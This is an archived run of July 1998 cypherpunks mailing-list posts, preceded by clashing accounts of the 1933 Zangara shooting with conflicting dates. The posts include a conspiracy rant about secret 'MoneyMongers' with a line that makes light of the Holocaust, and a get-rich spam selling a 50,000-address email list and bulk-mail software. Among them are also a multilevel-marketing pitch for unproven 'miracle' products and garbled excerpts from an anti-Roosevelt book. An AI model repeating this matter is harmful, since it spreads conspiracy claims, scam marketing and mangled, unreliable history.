Although none of the shots hit President Roosevelt, Zangara mortally

wounded Anton Cermak, the Mayor of Chicago, and hit four other people,
including a Secret Service agent.

Version 3.9, Rev. 2-B:
On February 15, 1933, Zangara attended a speech given by Roosevelt
at 
Bayfront Park in Miami, Florida.
When Roosevelt had finished his talk and was preparing to leave, Zangara

pulled out a pistol and opened fire.
Zangara wounded five people who had been near the president-elect,
two of 
them seriously. Most critically injured was Chicago Mayor Anton Cermak,

who was struck by the bullet in the chest which then lodged in his
spine. 

Version 4.9, Rev. 8C:
The parade car moved slowly down the street as President-elect Roosevelt

and Mayor Cermak smiled and waved. The car stopped and President-elect

Roosevelt gave a speech while sitting on the back of the car. A man
named 
Guiseppe Zangara pushed through the crowd. He fired five shots at the

President-elect. The bullets hit four people and Mayor Cermak.

Version 15.6, Rev. 7:
On March 6, Mayor Cermak died from complications stemming
from the shooting. The same day Zangara was indicted by a
grand jury and charged with first degree murder in the death of
Cermak. His trial began on March 9 and ended on March 11
with a guilty verdict and a death sentence. The prisoner was
transported to the Florida State Prison at Raiford, where he was
executed on March 20, 1933. 

Version 18.9, Rev. 5D:
Mayor Anton J. Cermak died three weeks later, on March 8, 1933. His

body was taken back to Chicago and buried in the Bohemian National

Cemetery.
Guiseppe Zangara was executed in the electric chair on March 21, 1933.

That was only 13 days after Mayor Cermak died.

Version 32.9, Rev. 12:
Consider the case of Guiseppe Zangara, who was executed in 1933 for
the
attempted assassination of President-elect Franklin D. Roosevelt in
which 
Chicago Mayor Anton J. Cermak was fatally shot. Zangara pleaded guilty
in 
state court on March 10, was sentenced to death, and was executed on

March 20 -- an interval of 10 days!

Version 82, Rev. 5Q:
After Roosevelt had delivered a speech in Florida on February 14, 1938,

Guiseppe Zangara, an unemployed bricklayer, fired six shots from a
handgun 
at Roosevelt from twelve yards away. The president-elect, who was sitting
in an open car, was uninjured but five other people were shot, including

Chicago mayor Anton Cernak, who was killed. 

Version 95, Rev. 8:
On February 15, 1933, Guiseppe Zangara rose early...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sun, 26 Jul 1998 11:43:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The Plot
Message-ID: <009C9C13.3FFFC220.15@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



The Plot of son of ?ThePlatypus
-------------------------------

Gathered information reveals:
1. US Presidents and important political figures count
  on the Secret Service for protection. Secret Service
  agents are in the employee of the MoneyMongers who
  rule the US Treasury Department.
   Thus, if the MoneyMongers don't approve of a powerful
  individual's political policy and actions...

2. Presidents and other political figures seem to die at
  particular junctures of time wherein they have already
  served their purpose to the Controllers. (Note: 'die'
  either physically or politically.
    i.e. - FDR croaking shortly after getting Truman
    elected as the hand-picked replacement of shadowy
    figures.

3. Ronald Reagan and FDR were both 'front men' for their
  wives, and/or those in their wives shadowy background.
    FDR, through the efforts of Elanor and her cohorts,
   was paid A QUARTER OF A MILLION DOLLARS in order to
   enter the New ork governor's race.

4. Accounts of the life and times of FDR inevitably contain
  a generous sprinkling of references to Luck!
    (e.g. - Fortuitous Circumstances as opposed to PART OF
     AN EVIL PLOT B THE SECRET CONTROLLERS WHO RULE THE
     WORLD FROM BEHIND THE SCENES!!!)

5. Hitler and his Evil Empire was no more a 'fluke of nature'
  than Lenin and his Evil Empire.
   The 'infiltration' of the American political scene by a
  wide variety of people with socialist or communist beliefs
  and agendas was not some mysterious, unplanned 'accident'.
   The rise of Eugenics, with the resulting implications of
  a Master Race embodied in genetic control, was a worldwide
  phenomena promoted by intellectuals and leaders in all
  nations, not just in the nation which gave Eugenics a
  'bad name' by instituting the end result of a Planned
  Society a little too fast to prevent disturbing the
  average persons natural pace of increasing moral compromise.

6. Neither Oswald nor Hitler 'acted alone.'
   Try starting a World War without the backing and support
of the MoneyMongers and the PowerBrokers. Lots of luck...

7. After Pavlov discovered biological mechanisms for the
  control of when dogs drool, his research did not come
  to a halt.
   Political and Military Czars who had a hand in developing
  and researching brainwashing techniques epitomized by 'The
  Manchurian Candidate' did *not* decide it would be wrong
  to use the techniques, just to increase their money and
  power.
    oung boys in the throes of publerty do *not* refrain
  from imagining what their large-breasted teacher would
  look like, naked, after reading 'The Invisible Man'.

8. Viewing the life and times of FDR (and probably any other
  political/religious leader) is *scary* if one lets their
  mind contemplate the 'possibility' of deep, dark conspiracy
  theories being True!!
    Why? Because one can construct a Dark Theory that makes
  as much (if not *more*) sense than the Standard Authorized
  View Of History And Reality promoted in educational
  materials, government pamphlets and corporate advertising.
  (i.e. - The Allies burned a few Jews, but they didn't
   inhale...)

9. Nobody acts alone...Anonymous acts secretly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Sun, 26 Jul 1998 05:05:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: noneRe: read please.....
In-Reply-To: <55592c1.35ba9c3b@aol.com>
Message-ID: <19980726120503.1157.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Jul 1998 23:02:18 EDT  AT666IND@aol.com wrote:

>HELLO, IS THERE ANY WAY TO GET MY HANDS ON S BOOK THAT SHOWS THE REAL BASEBALL
>PEOPLE AUTOGRAPHS AND THE FAKES SO I KNOW WHAT TO LOOK FOR???

At last!!  Something on-topic for cypherpunks!  And in k-RaD caps too.  AOL fucking rocks man!

Where's Toto?










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marlin1374@juno.com
Date: Sun, 26 Jul 1998 14:21:39 -0700 (PDT)
To: marlin1374@juno.com
Subject: Did I get the right email address?
Message-ID: <199807262120.OAA22954@mail1.eni.net>
MIME-Version: 1.0
Content-Type: text/plain


                  
           "SHOW ME THE MONEY!"............Not a problem!

I am about to share with you a unique opportunity to start a very successful 
business or take an existing one to new heights.  By taking advantage of the 
following breakthrough knowledge in marketing trends, you will soon discover 
the art of . . . 

"How to Really Make Money on the Information Superhighway!"

Some of you may already be marketing a product online. Maybe you are even 
making a sizeable profit! Whatever the case may be, no matter how successful 
you are right now, my guess is that your bank account is still not overflowing 
and MORE MONEY with LESS WORK peaks your interest.

FACT 1 :  ANYONE WHO HAS THE DRIVE TO SUCCEED CAN ACTUALLY MAKE 
A SIZABLE PROFIT ON THE INTERNET.

FACT 2 :  FEW PEOPLE ARE WILLING TO TAKE THE TIME TO ACTUALLY DO IT.

FACT 3: THESE PEOPLE ARE CRAZY!!

Seriously friends...Why would people want to pass up an extremely valuable 
money making opportunity?

Many people think that Marketing on the Internet takes more time than any 
human being can spare.  "There is so much to learn" some say.  "I can't even 
find the time to check my E-mail, how will I ever learn enough about the internet 
to make money?" others quote.  The fact is that in many cases this us true, there 
is a wealth of information on the internet about how to "market" this and how 
to "sell" that. Unless you know what to look for, it can become an endless maze 
of dead ends and wasted time.

Now think about this...

WHAT IF? I could provide YOU with an incredible Marketing Package 
that encompasses all the "How To" information you need to be a success 
on the Internet.  This phenomenal package includes DETAILED Internet 
SECRETS (we don't hold anything back, its all here folks!!), which explains 
in detail how to Profit from the Internet Explosion.  Whether you have a 
business of your own or you want to start one.  It's filled with over 45 
packed pages revealing the secrets about electronic marketing so many 
other online marketers DON'T want you to know.

I thought that might interest YOU.

Let me explain.

<><><><><><><><><><><><><><><><><><><><><><><><>
 
Right now there are over eighty million people surfing the Internet.  By
the year 2000, that figure is expected to more than double. With so many 
people using the Internet, smart "net"repreneur's are taking advantage 
of what this new (in terms of true commercial application) and exciting 
medium has to offer.

The Internet presents one of the best ways to make money that has 
ever been introduced. On any given day you have the opportunity to 
present your message to more than eighty million people! That's right...
EIGHTY MILLION people. That is more people than one multi million 
dollar advertisment reaches at the Super Bowl. This is the reason so 
many businesses are scrambling to make their presence known on the 
Internet.  Not only does the internet let you reach these people, it lets 
you pitch these people on your product or services. That means it gives 
you the abillity to sell..sell..sell!!  it also gives you the resurces you 
need to  MAKE EXCELLENT MONEY. And we do mean excellent money!!!

CONSIDER THE POSSIBILITIES: You wake up each morning at your 
leisure and put on a pot of coffee. As you sip on your cup of hot "brew" 
you saunter over and turn your computer on. Then, as your monitor 
glows from dim to bright, you find that you have inquiries from all sorts of 
people requesting what you have to offer. Later, after you have 
finished reading your inquiries, you stroll out to your mailbox. You 
find it is filled with letters from people from all across the world! 
What's even better though, is that the letters are FILLED WITH 
MONEY; cash, checks, and money orders. Then, after tallying 
up the totals, you find that you have made anywhere between  
$200 to $1,000 and it isn't even one o'clock in the afternoon. 
 
Think of it: NO boss, NO traffic, and NO annoying Co-workers. 
Wouldn't it feel great to wake up in the morning knowing you 
are going to be making excellent money but don't have to leave 
your house to do it!?!  Wouldn't your life be far less complicated?

The truth is, you can be one of those who become financially
independent via the Internet. AND THE BEST PART IS...IT 
DOESN'T REQUIRE A LOT OF MONEY!!

What it does require is the knowledge of how, what, and where 
to do it. That is where we can help. Here at Natural Instincts, we 
provide you with the knowledge of how to begin earning substantial 
income from your computer via the "information superhighway".   

We can remember how overwhelming the Internet seemed when we
were first introduced to it.  We realized the marketing and profit 
potential the Internet holds, but really had no idea how to pursue it. 
In our thirst for answers and knowledge, we purchased everything 
we could find that had information on the How, What, and Where. 
We spent thousands of dollars, but we now know what works and
what doesn't.  No where, in all of our searching, could we find a 
complete packet of information for all of our questions.  That is why 
we decided to write this report.  We have compiled every proven 
method and secret that we have learned along the way into one 
complete, easy to understand report.

This PROVEN REPORT makes believers of skeptics!  

Sound too good to be true?  That's what others have said.  That is, 
until they received their reports and saw for themselves just how easy
it is to make money on the net! Check out these satisfied customers...


Hi NI,

I received your report and free bonuses last Saturday and wanted to
congratulate you on a job well done. I read through your report "How 
To Profit From The Internet" and I'm very impressed.  I have bought 
other books and manuals about  Online Marketing, Direct Marketing, 
E-mail, Mail Order, etc. Yours is the only one that explains the
subject  in an easy to understand language.  I finally found the 
secrets I've been looking for. 

Once again, Great Job!

Sincerely,
John Strand - Satisfied Customer



My father has always told me, "remember, Michele, there is no free 
lunch in life. You get out of life what you put into it."  Through trial 
and error and a somewhat slow frustrating start, I purchased your 
report and finally figured out how to start a very profitable business
from my home. Your report is great, you give the average person 
the tools and secrets to succeed.  I know my dad is very proud of 
me now.

I can't thank you enough =)

Michele B from Oregon


Good Morning,

I hope this finds you well.  I received your program yesterday after-
noon and read it cover to cover.  You have put together a very 
valuable resource indeed.  I have finally found the program that 
tells all!  Your program has given me the tools I need to succeed.  
Your program could truly end up being the best $39.95 I ever spent!

Your the best, I'm making your manual into my internet Bible!!  
Thanks a million!

Best Regards,
Mary W
Florida

To whom it may concern-

I'm usually the first person to write a negative criticism about a product, 
being a "consumer Advocate" columnist for a well respected newspaper.  
To tell you the truth, I ordered your product to do an expose on Internet 
scams.  But, as I was reading through your manual, I discovered what 
truly valuable information your company has put together, and for an 
affordable price.  It is very rare for a "complaint columnist" to give a 
good review, but for the first time, I need to tell you that your manual 
you have put together is OUTSTANDING!!!  I have wanted for the last 
few years to start a business on the Net, but have been deathly scared of 
taking that step to get started.  But then I discovered your manual and put 
the tips and secrets to work. I haven't been able to keep up with the orders, 
and it's only my second month!!!  I can't wait to see where I will be in six 
months!

Thank you,

Rick Johnson  
Alabama


This is a wonderful opportunity, we urge you to take advantage of it. 
You won't find too many people that will give away ALL of their
secrets!!  The majority of the rich people today have copied what  
someone else is or has been doing.  That is what we are offering 
you now--a chance to copy our success!!  It is very easy and we 
ARE for REAL!

Here's a little more incentive to check this out...

~IF YOU ORDER WITHIN 3 DAYS~

We will send you:

 **** FREE $400 Bulk e-mail Software ****
 **** FREE $200 Check by phone, fax, E-mail Software ****
 **** FREE $10 Calling Card ****
 
----PLUS----

We will send you a list of over 100 major search engines ready to
surf on the Internet or to place a free link to your web page.   Also, 
you will receive a list of  98 of the best inexpensive newspapers to 
advertise in (U.S. orders only).  The list is complete with papers name, 
city, phone number, circulation and frequency  (Daily or Weekly).  

We will also include five free BONUS reports that include these topics:
 How to Protect your PC from Viruses
 How to get 300+ Quality Prospect to E-mail you Weekly
 Tips and Secrets to Advertising with the major Online Services
 What's wrong with the World Wide Web 
 Tax Advantages for the Home Business Owner.  
You will find that these five reports by themselves are worth 
thousands of dollars to you. These bonuses alone are worth several 
times the cost of the report.

We will also give you a secret list of over 1500 of the best Web sites 
where you can place a FREE advertisement.  This is a list we use 
every day to run our business and we are giving it to you!  Imagine 
what a great offering we are giving you for FREE! 

And we're not through, if you order RIGHT NOW, we will give you 
15 FREE "How to Reports" that you are free to market and sell on the 
Internet or through mail order for $15-30 each.  They are 45-60 
informational packed pages each.  A great way to start your own 
Net based business!  The topics are;

            1)   Earn Extra Dollars with a Home Based Answering Machine 
            2)   How to Buy a Car with Bad Credit 
            3)   How to Make Thousands of Dollars Winning Contests 
            4)   U.S. Government Auction Sales 
            5)   An Insider's Guide to Finding and Obtaining Grant Money 
            6)   Home Based Business for Fun and Profit 
            7)   How to Get a Job Fast 
            8)   How to Make Money Without Leaving Your House 
            9)   How to Turn the Hobby of Photography into Thousands 
           10)   Making Money at Garage Sales, Swap Meets, and Flea Markets 
           11)   How to Get Paid for Watching TV 
           12)   Getting Your Start in Theater, Television, and Movies 
           13)   Wills or Trusts?  The Case for Living Trusts 
           14)   How To Find Work with the Federal Government 
           15)   How to Write Almost Anything and Get Paid for it!

            50,000 EMAIL ADDRESSES FOR FREE
That's right, we will give you our BEST private list of 50,000 email addresses.  
This list of addresses has been put through our remove and undeliverable lists 
so that it is fresh and responsive.  We are constantly adding and taking 
addresses out of it.  It is absolutely the best 50,000 email addresses you will 
ever get your hands on, BAR NONE!
(please note:  we are only giving this bonus to the first 50 people, so Don't Wait!!!)
 
So you are probably thinking to yourself, this is wonderful, but how much?  
$149.95,  $99.95 maybe even  $79.95?  You may have seen other companies 
marketing "How To" information on the Internet and charging these prices. 
People are actually buying these packages at these prices.  Why?  People 
want to know how to market a product or service the "Right" way on the 
Internet.  "How to Profit from the Internet" could easily sell for any of the 
above prices.  However, we feel that we would rather help those who 
may not have the ability to pay such a price in order to be successful.  
That is why we are offering "How to Profit from the Internet" at the low 
price of $39.95.

That's right, that was not a typo...$39.95.  

I have sold this package at much higher prices in the recent past and will be
forced to raise my prices in the very near future. One of the things
you will learn in my course is to constantly test your market.  I am
currently in the price testing phase of this marketing campaign.
On Augast 15th, 1998, I will be raising the price of this package
back up to $49.95 and eventually up to $79.95 to test the upscale market.
If you act quickly, you have the opportunity to get these materials today
for the unbelievable low price of $39.95.

Still skeptical???  Lets put that to rest right now.  We will make this 
completely risk free for you.  If you are not 100% satisfied with the
information you receive, and believe that you cannot use it to start a
successful business or increase your current business profits, return it
within 30 days and we will refund your money.  No questions asked!!  

Are we nuts?

No, it just shows how confident we are that you'll be delighted with 
the information you'll have...just like the others who are already using 
the information and making money.  You will be surprised how quickly 
you can be earning money on the Internet!

So, if you are seriously interested in learning how to acquire wealth 
by being online, ACT NOW!!  This won't last for long!

Print out this form and mail it to the address below, with your $39.95 
cash, check, money order or credit card information.


Natural Instincts
4676 Commercial St. SE Suite 201 
Salem, Oregon 97302   


Thank you =) 

****Please print out the order form and mail it along with your payment****

************************************************************************
                                  ORDER FORM
************************************************************************

NAME______________________________________________________

ADDRESS___________________________________________________

CITY_______________________ STATE__________ ZIP__________

Website Address____________________________________________

Deliver "How to Profit from the Internet" to the following email address:

E-MAIL ADDRESS____________________________________________
(please note, all orders must include an email address incase we encounter a 
problem with processing.  The 50,000 email addresses will be sent to you by email)

Area code and Phone number:

Day time __________________  Evening:  ________________________

[ ] If you prefer to have the report on disk, please check here.  Please 
include an additional $3.00 for shipping and handling, thank you.
(If you reside outside the United States, please include $2.00 extra)

Please check one of the following:

[ ]  I'm ordering within 3 days, please send my FREE software, $10.00 
calling card, 15 How to Reports, "How To Profit From The Internet" 
and FREE BONUSES including 50,000 email addresses for the 
unbelievably low price of $39.95 today.

[ ]  I'm not ordering within the first 3 days of receiving this letter, so I 
agree to pay $39.95 for "How to Profit from the Internet" by itself, 
less the bonus package.

[Internal code 138702A] This code must be on order form to be processed!!!

Payment Method:                             

[ ] Check 

[ ] Cash

[ ] Money Order

[ ] Credit Card, please make sure to include the mailing address above!
          
   [ ] Visa       [ ]  MasterCard    [ ]  American Express   [ ]  Discover

Name of Credit Card: _____________________________

Name as it appears on Card: _________________________________

Card Number: __________________________________

Expiration Date: _____ / _____

Signature of Card Holder: _________________________.

************************************************************************
"In mail-order work, anyone with imagination, determination, and a
willingness to study and experiment may have very little difficulty
getting started. A number of the most successful one-man operations
obtain an income as high as $40,000 to $100,000 a year."

                - U.S. Department of Commerce
************************************************************************
THE MARKET IS HERE - TODAY!   TAKE ADVANTAGE OF IT!!!!!
After you receive your report, I'll answer any questions time permits 
via email.  I'm looking forward to helping you succeed!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 26 Jul 1998 12:54:09 -0700 (PDT)
To: "e$@vmeng.com" <e$@vmeng.com>, "Cypherpunks" <cypherpunks@toad.com>
Subject: Computing with DNA...
Message-ID: <199807262009.QAA21570@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi everybody!

Have a look at Scientific American August 1998 for an article by L. Adleman (of RSA fame) about how he 
solved a computationnally gigantic problem in less than a second with a few drops of stinking liquid 
:-)    Unfortunately, the article is not available from www.sciam.com, so you'll have to buy the paper 
version of the magazine.   *FASCINATING*

Also, have a look at 

http://cwis.usc.edu/dept/News_Service/chronicle_html/1995.10.23.html/Supercomputing_with_DNA_.html

Ciao

jfa




Jean-Francois Avon, Pierrefonds (Montreal), Canada

Unregistered Firearms in the hands of honest citizens: Liberty's Teeth
Strong Cryptographic tools in the hands of honest citizens: Liberty's Voice

He who beats his sword into a ploughshare will get coerced to plow for 
those who don't...

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: users1@comports.com
Date: Sun, 26 Jul 1998 18:31:17 -0700 (PDT)
To: users1@comports.com
Subject: Dear Prospective Entrepreneur
Message-ID: <199807270113.SAA23863@helix.pathology.ubc.ca>
MIME-Version: 1.0
Content-Type: text/plain


Dear Prospective Entrepreneur;

I have been an attorney for 26 years, but recently I
joined a company which is only 3 years old, and is 
growing at a fantastic rate; in fact, after only 10 
months old, it was featured in SUCCESS MAGAZINE, and
it has been the #1 rated network marketing opportunity
for the last three years.

What makes this company and this opportunity I am 
offering you so great, is the fact that we (Marketing
Executives) have "EXCLUSIVE" marketing rights in the 
United States to new miracle products that are
providing dramatic benefits to people who have two of
the worst diseases known to mankind.  Americans who
learn about and need our products, can only get
them through us, and not from other companies, or the
corner drug store.

After getting into other companies in the last several
years, and going from company to company, and product
to product (mostly companies that failed, or had falsely
advertised products), I finally found this company that 
is truly "CREDIBLE," has tremendous products, a great
compensation plan, and, best of all, my customers are
calling me back month after month.

Since the products actually sell themselves, I'm NOT
constantly on the phone, or forever hustling all my
relatives and friends. Products that make people feel
better (especially natural products that have no side
effects, and do have a 60 day money back guarantee)
cause people to call me every month, instead of me 
calling them.

Our "exclusive" and "patented" all natural products
have also gone through the double blind clinical 
studies and have produced unbelievable sales in foreign
markets, and have only recently been introduced into
the United States, so our timing is also perfect.

If you are interested in trying our products and/or
looking at this business opportunity, call me toll-free
at 888-203-6668 and leave your name, telephone number,
and/or your address if you want more information. You 
also can respond to exclusive@apexmail.com.

If you are ready to make some changes in your life, free
up some time to spend with your family, and make some
extra money, call me or e-mail me.  WHAT HAVE YOU GOT TO
LOSE?  I made that same call a few months ago, and I 
promise, you will be happy to hear more about this tre-
mendous company, its great products, and about how easy 
it will be for you to make that extra money.

Thanks, 
Clyde Fontenot


This message is brought to you from Clyde Fontenot, 
Attorney, 504 W. Main St., Ville Platte,LA.70586,
318-363-5535.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sun, 26 Jul 1998 02:39:57 -0700 (PDT)
To: (Recipient list suppressed)
Subject: One Nation August Newsletter
Message-ID: <1.5.4.32.19980726083414.00743588@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 2.3, August 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear One Nation supporter in NSW

Pauline Hanson has just completed a whirlwind tour of Australia.

The tour has been an enormous success - although this aspect of her rallies
has been largely ignored by the media.

You will have noted the coverage given to the protests and for this reason
we would like to draw your attention to the following web pages.

The first demonstrates the links between extremists within the Labor party
and the violence perpetrated by protesters at One Nation meetings:
http://www.gwb.com.au/gwb/news/onenation/left/meljul98.html

The second looks at the organisation behind the student protests:
http://www.gwb.com.au/onenation/school.html

We would draw your attention to the new moderated on-line discussion forum
which you are encouraged to join and participate in. 

This can be found at: http://plato.itsc.adfa.edu.au/politics/

Finally, to make your navigation of the large One Nation web site easier we
have installed a theme based 'site map' which can be found at:
http://www.gwb.com.au/onenation/site

GWB


Scott Balson
Pauline Hanson's Web Master





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cory <cory4321@yahoo.com>
Date: Sun, 26 Jul 1998 21:42:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: enc....
Message-ID: <19980727043530.4083.rocketmail@send1d.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain





"Bernardo B. Terrado"  wrote:
 
> A virus uses encryption to hide itself (correct?),
> but will the files in a pc be safe from virus when encrypted? why?


a virus can be encrypted or it could leave itself open. usaually the
first.

it all depends on the combination of what virus and encryption
software you use.
Many times a virus will infect by waiting for you to open a file (run,
copy, move)
when it sees a file open it will add itself to the end and then move
the start
of the program to the virus.  When the program is executed it jumps to
the virus who loads itself
into memory and then jumps seamlessly to the beginning of the program,
unperceptibly( if done right)

If your files are encrypted by a program that stays in memory and lets
programs run like normal a virus will run like
normal.  If you have an uninfected file PGPed when you extract a copy
it will become infected like a normal file
however the pgp file will not be infected.  If the encryption is built
into the program and has a checksum 
you will be notified if it is infected but if it just runs a
decryption routine and then starts the program then it 
could be infected before the decryption routine.

in general if you can read/write a file so can a virus.

If you are worried about infection, get an uninfected copy and
make a detached pgp .sig  then run it on your computer in a batch file
so
pgp checks the signature before it runs.  if pgp fails the sig. your
program is infected
each virus is unique and acts differently, remember they are just
written  like normal programs.
If you are indepth interested, search for a virus authors page. 
Anti-virus people are vague so
you don't figure out how to make one but a virus author will probably
have guides on how to make
a virus.  This gives you intimate knowledge of a virus's abilities.
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CEr1942929@aol.com
Date: Sun, 26 Jul 1998 20:26:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE:Brother
Message-ID: <41c2b3b5.35bbf35d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to find my brother, "Allen Thomas Taylor" I am not sure what year
he was born but I think it was l922, l923.  We have the same Father, "Alva
Thomas Taylor", my name is Christine (Taylor) Ernest, I was born l935, in Mt.
Vernon, Mo..  I have not seen my brother in 60yrs.  The last I heard he was
working for the civil service in Washington, DC, and got married in Maryland.
Any information I would appreciate.

Thank you
Sincerely
Christine Ernest




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sun, 26 Jul 1998 23:50:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR.doc and FDR2.doc
Message-ID: <009C9C78.E5ED3900.9@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



It seems that the forementioned files never made it to the list
(at least as echoed by infinity.nus.sg), as a result of being
filtered out somewhere along the way due to their excessive size.

Realizing that this was likely the result of filtering for the
benefit of list members, so that they would not be stuck with
wasting their resources downloading large amounts of tripe by]
spamming assholes, I consulted John Gilmore as to what action
to take on this matter.
John informed me that one thing he learned from Dimitri was that,
"The Spammer interprets filtering as common-sense, and routes
around it."

Accordingly, I have broken the files down into FDR1.txt --> FDR8.txt,
so that the lack of AOL'ers competent enough to seriously piss off
list members would not lead to VeteranAryan CypherPunks forgetting
about the GoodOldDays (TM), when we had Sandy Sandfort to kick around
for attempting to put a stop to this kind of bullshit.

Sincerely,
<billg@microsoft.com>
"Flame me, I dare you!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:13:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR1
Message-ID: <009C9C7C.0C6CD880.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


As to the President, it is an account of an image projected upon the
popular mind which came to be known as Franklin D. Roosevelt. It is
the author's conviction that this image did
not at all correspond to the man himself and that it is now time to
correct the lineaments of this synthetic figure
created by highly intelligent propaganda, aided by mass illusion and
finally enlarged and elaborated out of all
reason by the fierce moral and mental disturbances of the war.

The moment has come when the costumes, the grease paint, the falsely
colored scenery, the technicolored
spotlights and all the other artifices of makeYDup should be put aside
and, in the interest of truth, the solid facts
about the play and the players revealed to the people. 

July, 1948 

Preface to the Popsvox PublishingR edition 

Someone once said that Washington DC is a place where history is taken
for granted and granite mistaken for
history. The new FDR "memorial" is notable for what it forgets. John
T. Flynn, active columnist and author
throughout the Roosevelt years and beyond, made an enormous contribution
to accurate reporting and
genuine understanding of the New Deal. Unfortunately, Flynn's work
has been out of print for decades while
the politically correct elite have not only preserved the myth, they
have now literally cast it in stone. 

Do not despair. The technology of the information age provides a remedy.
Flynn is back, facts, footnotes and
all, and in an electronically enhanced form unimagined in the age when
journalists scribbled on notepads with
pencil stubs. As a MicrosoftR WindowsR help file, it can be searched,
annotated, printed out . . . or even read,
page by pungent page. Even better for students, editorialists or online
newsgroup debaters, the electronic
version is only a mouse-click away when a citation is needed. No more
flipping through paper texts in search of
a passage about the Democratic National Committee or the $3,000.000
income Eleanor took down as First Lady.
Find what you want when you want it. Add your own annotations and memory
joggers. Tools are the human
heritage, as are words and ideas. 

This revived book is produced for the Historical Research Foundation
in New ork whose mission is the
conservation of truth in history. 

- Ed.

Saturday morning, March 4, 1933...the conquering Democrats poured into
the city, hastening to take over after so many hungry
years in the wilderness. 
{Hitler/1933?-sog}

Only a week before an assassin's bullet had barely missed Roosevelt.
It
struck Anton Cermak, the Bohemian mayor and boss of Chicago, who with
Al Smith, had opposed Roosevelt's
nomination. 
he got the bullet intended for Roosevelt {BIG Assumption - sog}and
died a few days later. 

Later, as Roosevelt's train sped from New ork to Washington carrying
himself and
his family, word came to him that aboard another train carrying the
65YDyearYDold Senator Thomas J. Walsh and
his bride of two days, the aged groom dropped dead in his Pullman drawing
room. He was speeding to the
capital to be sworn in as Attorney General. 

Two weeks before the lameYDduck Congress had turned a
somersault and voted the amendment to the Constitution ending Prohibition.

FortyYDone legislatures were in
session waiting eagerly for the chance to approve the wet amendment
and to slap taxes on beer and liquor to
save their empty treasuries. 

The country, the states, the towns needed money YD something
to tax. And liquor was the richest target. "Revenue," said one commentator,
"unlocked the gates for Gambrinus
and his foaming steed." 

first of all, let me assert my firm belief that the only thing we have
to fear is fear
itself." 

"The means of exchange are frozen in the streams of trade."

"et our distress comes from no failure of substance. We are stricken
by no
plague of locusts3,300,000,000 YD in
addition to all the other specific appropriations for government, into
his hands to be spent at his sweet will in
any way he desired. The great purse YD which is the greatest of all
the weapons in the hands of a free parliament
to oppose the extravagances of a headstrong executive YD had been handed
over to him. The "spendthrift"
Hoover was in California at his Palo Alto home putting his own affairs
in order, while the great Economizer who
had denounced Hoover's deficits had now produced in 100 days a deficit
larger than Hoover had produced in
two years. 

Roosevelt had no wish to stem the
panic. The onrushing tide of disaster was sweeping the slate clean
for him YD at the cost of billions to investors
and depositors. The greater the catastrophe in which Hoover went out
of power the greater would be the
acclaim when Roosevelt assumed power. 

For this drastic decision there could be, of course, but one excuse,
namely that Mr. Roosevelt had a definite
plan and that such a plan could be better carried out with a full disaster.
What, then, was his plan? We shall see
presently.4 

the crisis had assumed a terrifying
aspect. To this was added the fear of inflation and of irresponsible
and even radical measures by the new
President. One of these, of course, was the agitation which went on
behind the scenes for the nationalization of
the whole banking system. Men close to the President-elect were known
to be for this.

Then Glass asked Roosevelt what he was going to do.
To Glass' amazement, he answered: "I am planning to close them, of
course." Glass asked him what his
authority was and he replied: "The Enemy Trading Act" YD the very act
Hoover had referred to and on which
Roosevelt had said he had no advice from Cummings as to its validity.
Glass protested such an act would be
unconstitutional and told him so in heated terms. "Nevertheless," replied
Roosevelt, "I'm going to issue a
proclamation to close the banks." 

After delivering his inaugural address, Roosevelt issued a proclamation
closing all banks.

They decided that the action
must be swift and staccato for its dramatic effect; that the plan,
whatever it might be, must be a conservative
one, stressing conventional banking methods and that all leftYDwing
presidential advisers must be blacked
out during the crisis; and finally that the President must make almost
at the same time a tremendous gesture in
the direction of economy.

w it is difficult to believe that it could
ever have been uttered by a man who before he ended his regime would
spend not merely more money than
President Hoover, but more than all the other 31 Presidents put together
YD three times more, in fact, than all the
Presidents from George Washington to Herbert Hoover. This speech was
part of the plan Moley and Woodin
had devised to sell the banking plan in a single package with the great
economy program. 

To the great audience that listened to the fireside chat, the hero
of the drama YD the man whose genius had led
the country safely through the crisis of the banks YD was not any of
the men who had wrestled with the problem,
